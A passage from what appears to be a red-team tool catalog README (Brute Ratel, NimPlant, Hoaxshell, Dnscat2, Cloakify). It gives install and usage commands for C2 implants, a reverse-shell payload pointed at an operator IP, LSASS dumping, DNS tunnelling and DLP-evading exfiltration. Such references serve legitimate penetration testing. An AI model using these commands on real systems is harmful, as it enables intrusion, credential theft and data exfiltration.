channels, such as HTTP, DNS, or TCP, and can be configured to use different encoding and encryption methods to evade detection.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eSome nice features:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eDNS Over HTTPS\u003c/li\u003e\n\u003cli\u003eIndirect Syscalls\u003c/li\u003e\n\u003cli\u003eBuilt-in Debugger To Detect EDR Userland Hooks\u003c/li\u003e\n\u003cli\u003eMITRE graph integration\u003c/li\u003e\n\u003cli\u003eAdversary TTP automation\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eTo legally get access to the framework you will need to buy a licence (1 Year $2500 per user). 
See the \u003ca href=\"https://bruteratel.com/pricing/\" rel=\"nofollow\"\u003epricing page\u003c/a\u003e for more information.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eAfter purchase you can download the framework from \u003ca href=\"https://bruteratel.com/tabs/download/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e with your Activation Key and License User ID.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Loads a powershell script to memory which can be Invoked using psreflect\npsimport\n\n# Locks keyboard and mouse hardware input. Use ‘unlock_input’ command to unlock\nlock_input\n\n# Dumps user clipboard\ndumpclip\n\n# Enumerates basic domain information\ndcenum\n\n# Elevates user privileges to SYSTEM (Requires admin rights)\nget_system\n\n# Takes a screenshot of current desktop and stores it on the server\nscreenshot\n\n# Dumps LSASS to C:\\Windows\\Memory.DMP using the PssCaptureSnapshot technique\nshadowclone\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Loads a powershell script to memory which can be Invoked using psreflect\u003c/span\u003e\npsimport\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Locks keyboard and mouse hardware input. 
Use ‘unlock_input’ command to unlock\u003c/span\u003e\nlock_input\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Dumps user clipboard\u003c/span\u003e\ndumpclip\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Enumerates basic domain information\u003c/span\u003e\ndcenum\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Elevates user privileges to SYSTEM (Requires admin rights)\u003c/span\u003e\nget_system\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Takes a screenshot of current desktop and stores it on the server\u003c/span\u003e\nscreenshot\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Dumps LSASS to C:\\Windows\\Memory.DMP using the PssCaptureSnapshot technique\u003c/span\u003e\nshadowclone\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull commander terminal usage information can be found \u003ca href=\"https://bruteratel.com/tabs/badger/badgers/\" rel=\"nofollow\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210181655-74201cad-a782-43ed-97d3-f4c0926d46c3.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://bruteratel.com/\" rel=\"nofollow\"\u003ehttps://bruteratel.com/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/chvancooten/NimPlant\"\u003eNimPlant\u003c/a\u003e\u003c/h3\u003e\u003ca 
id=\"user-content-nimplant\" class=\"anchor\" aria-label=\"Permalink: 🔙NimPlant\" href=\"#nimplant\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA light-weight first-stage C2 implant written in Nim.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFeatures:\u003c/p\u003e\n\u003cul dir=\"auto\"\u003e\n\u003cli\u003eLightweight and configurable implant written in the Nim programming language\u003c/li\u003e\n\u003cli\u003eEncryption and compression of all traffic by default, obfuscates static strings in implant artefacts\u003c/li\u003e\n\u003cli\u003eSupport for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables\u003c/li\u003e\n\u003cli\u003eEasy deployment of more advanced functionality or payloads via \u003ccode\u003einline-execute\u003c/code\u003e, \u003ccode\u003eshinject\u003c/code\u003e (using dynamic invocation), or in-thread \u003ccode\u003eexecute-assembly\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eComprehensive logging of all interactions and file operations\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" 
data-snippet-clipboard-copy-content=\"curl https://nim-lang.org/choosenim/init.sh -sSf | sh\nchoosenim stable\ngit clone https://github.com/chvancooten/NimPlant\ncd client\nnimble install -d\npip3 install -r server/requirements.txt\napt install mingw-w64\"\u003e\u003cpre\u003ecurl https://nim-lang.org/choosenim/init.sh -sSf \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e sh\nchoosenim stable\ngit clone https://github.com/chvancooten/NimPlant\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e client\nnimble install -d\npip3 install -r server/requirements.txt\napt install mingw-w64\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Generate payloads\npython .\\NimPlant.py compile all\n\n# Start server\npython .\\NimPlant.py server \"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Generate payloads\u003c/span\u003e\npython .\u003cspan class=\"pl-cce\"\u003e\\N\u003c/span\u003eimPlant.py compile all\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Start server\u003c/span\u003e\npython .\u003cspan class=\"pl-cce\"\u003e\\N\u003c/span\u003eimPlant.py server \u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eBefore running make sure to create the \u003ccode\u003econfig.tool\u003c/code\u003e configuration file, more information can be found \u003ca href=\"https://github.com/chvancooten/NimPlant#getting-started\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found \u003ca href=\"https://github.com/chvancooten/NimPlant#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://casvancooten.com/posts/2021/08/building-a-c2-implant-in-nim-considerations-and-lessons-learned/\" 
rel=\"nofollow\"\u003eBlog - Building a C2 Implant in Nim - Considerations and Lessons Learned\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/220959859-d930b110-c774-4b4c-b004-e4a85a6214ba.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://casvancooten.com\" rel=\"nofollow\"\u003ehttps://casvancooten.com\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/t3l3machus/hoaxshell\"\u003eHoaxshell\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-hoaxshell\" class=\"anchor\" aria-label=\"Permalink: 🔙Hoaxshell\" href=\"#hoaxshell\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse 
shell.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/t3l3machus/hoaxshell\ncd ./hoaxshell\nsudo pip3 install -r requirements.txt\nchmod +x hoaxshell.py\"\u003e\u003cpre\u003egit clone https://github.com/t3l3machus/hoaxshell\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e ./hoaxshell\nsudo pip3 install -r requirements.txt\nchmod +x hoaxshell.py\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Payload that utilizes Invoke-Expression (default)\nsudo python3 hoaxshell.py -s \u0026lt;your_ip\u0026gt;\n\n# Payload that writes and executes commands from a file\nsudo python3 hoaxshell.py -s \u0026lt;your_ip\u0026gt; -x \u0026quot;C:\\Users\\\\\\$env:USERNAME\\.local\\hack.ps1\u0026quot;\n\n# Encrypted shell session with a trusted certificate\nsudo python3 hoaxshell.py -s \u0026lt;your.domain.com\u0026gt; -t -c \u0026lt;/path/to/cert.pem\u0026gt; -k \u0026lt;path/to/key.pem\u0026gt;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Payload that utilizes Invoke-Expression (default)\u003c/span\u003e\nsudo python3 hoaxshell.py -s \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eyour_ip\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Payload that writes and executes commands from a file\u003c/span\u003e\nsudo python3 hoaxshell.py -s \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eyour_ip\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -x \u003cspan 
class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Users\u003cspan class=\"pl-cce\"\u003e\\\\\\$\u003c/span\u003eenv:USERNAME\\.local\\hack.ps1\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Encrypted shell session with a trusted certificate\u003c/span\u003e\nsudo python3 hoaxshell.py -s \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eyour.domain.com\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -t -c \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003e/path/to/cert.pem\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e -k \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003epath/to/key.pem\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage documentation \u003ca href=\"https://github.com/t3l3machus/hoaxshell#usage\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://www.youtube.com/watch?v=SEufgD5UxdU\" rel=\"nofollow\"\u003eUsage Demo - YouTube\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://github.com/t3l3machus/hoaxshell#av-bypass-pocs\"\u003eHoaxshell vs AV\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/229649767-817d838c-891d-4a33-b494-9249f3a2f404.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/t3l3machus/hoaxshell\"\u003ehttps://github.com/t3l3machus/hoaxshell\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" 
class=\"heading-element\" dir=\"auto\"\u003eExfiltration\u003c/h1\u003e\u003ca id=\"user-content-exfiltration\" class=\"anchor\" aria-label=\"Permalink: Exfiltration\" href=\"#exfiltration\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/iagox86/dnscat2\"\u003eDnscat2\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-dnscat2\" class=\"anchor\" aria-label=\"Permalink: 🔙Dnscat2\" href=\"#dnscat2\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 
2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eA tool for establishing C2 connections via DNS, even if the attacker and victim machines are behind a firewall / network address translation (NAT).\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThe tool is designed to be stealthy and difficult to detect, as it uses legitimate DNS traffic to transmit data.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile - Server)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/server/\ngem install bundler\nbundle install\"\u003e\u003cpre\u003egit clone https://github.com/iagox86/dnscat2.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e dnscat2/server/\ngem install bundler\nbundle install\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Compile - Client)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/iagox86/dnscat2.git\ncd dnscat2/client/\nmake\"\u003e\u003cpre\u003egit clone https://github.com/iagox86/dnscat2.git\n\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e dnscat2/client/\nmake\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull installation information can be found in the \u003ca href=\"https://github.com/iagox86/dnscat2#compiling\"\u003eInstallation Section\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Server)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Establish the server\nruby ./dnscat2.rb 
DOMAIN.COM\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Establish the server\u003c/span\u003e\nruby ./dnscat2.rb DOMAIN.COM\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Client)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Establish the client with authoritative domain\n./dnscat2 DOMAIN.COM\n\n# Establish the client without authoritative domain\n./dnscat2 --dns host=0.0.0.0,port=0000\n\n# Ping the server from the client\n./dnscat --ping DOMAIN.COM\n\n# Ping the server from the client, with custom dns resolver ip\n./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Establish the client with authoritative domain\u003c/span\u003e\n./dnscat2 DOMAIN.COM\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Establish the client without authoritative domain\u003c/span\u003e\n./dnscat2 --dns host=0.0.0.0,port=0000\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Ping the server from the client\u003c/span\u003e\n./dnscat --ping DOMAIN.COM\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Ping the server from the client, with custom dns resolver ip\u003c/span\u003e\n./dnscat --dns server=0.0.0.0,domain=DOMAIN.COM --ping\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage: (Tunnels)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# (After establishing the client) You can open a new tunnelled port\nlisten [lhost:]lport rhost:rport\n\n# Forward ssh connections through the dnscat2 
client to an internal device\nlisten 127.0.0.1:2222 10.10.10.10:22\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e (After establishing the client) You can open a new tunnelled port\u003c/span\u003e\nlisten [lhost:]lport rhost:rport\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Forward ssh connections through the dnscat2 client to an internal device\u003c/span\u003e\nlisten 127.0.0.1:2222 10.10.10.10:22\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFull usage information can be found in the \u003ca href=\"https://github.com/iagox86/dnscat2#usage\"\u003eUsage Section\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210116521-0ef905ec-cc14-4cdc-9831-46bbded8c6af.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/TryCatchHCF/Cloakify\"\u003eCloakify\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-cloakify\" class=\"anchor\" aria-label=\"Permalink: 🔙Cloakify\" href=\"#cloakify\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 
1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eWhen exfiltrating victim files, DLP (Data Loss Prevention) solutions will typically trigger on strings within these files. Cloakify reduces this risk by transforming the data.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eCloakify transforms any filetype (e.g. .zip, .exe, .xls, etc.) into a list of harmless-looking strings. This lets you hide the file in plain sight, and transfer the file without triggering alerts.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eNote:\u003c/strong\u003e You can make your own ciphers, see \u003ca href=\"https://github.com/TryCatchHCF/Cloakify#create-your-own-cipers\"\u003ehere\u003c/a\u003e for more info.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/TryCatchHCF/Cloakify\"\u003e\u003cpre\u003egit clone https://github.com/TryCatchHCF/Cloakify\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Cloakify some text\npython3 cloakify.py TEXT.txt ciphers/desserts.ciph \u0026gt; TEXT.cloaked\n\n# De-Cloakify the text\npython3 decloakify.py TEXT.cloaked ciphers/desserts.ciph\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Cloakify some text\u003c/span\u003e\npython3 cloakify.py TEXT.txt ciphers/desserts.ciph \u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e 
TEXT.cloaked\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e De-Cloakify the text\u003c/span\u003e\npython3 decloakify.py TEXT.cloaked ciphers/desserts.ciph\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210117067-4611a42a-2ac7-44af-8aee-2e448c05909b.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/210116996-8ec36a12-8eef-44e9-924a-ad179e599910.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/ytisf/PyExfil\"\u003ePyExfil\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-pyexfil\" class=\"anchor\" aria-label=\"Permalink: 🔙PyExfil\" href=\"#pyexfil\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 
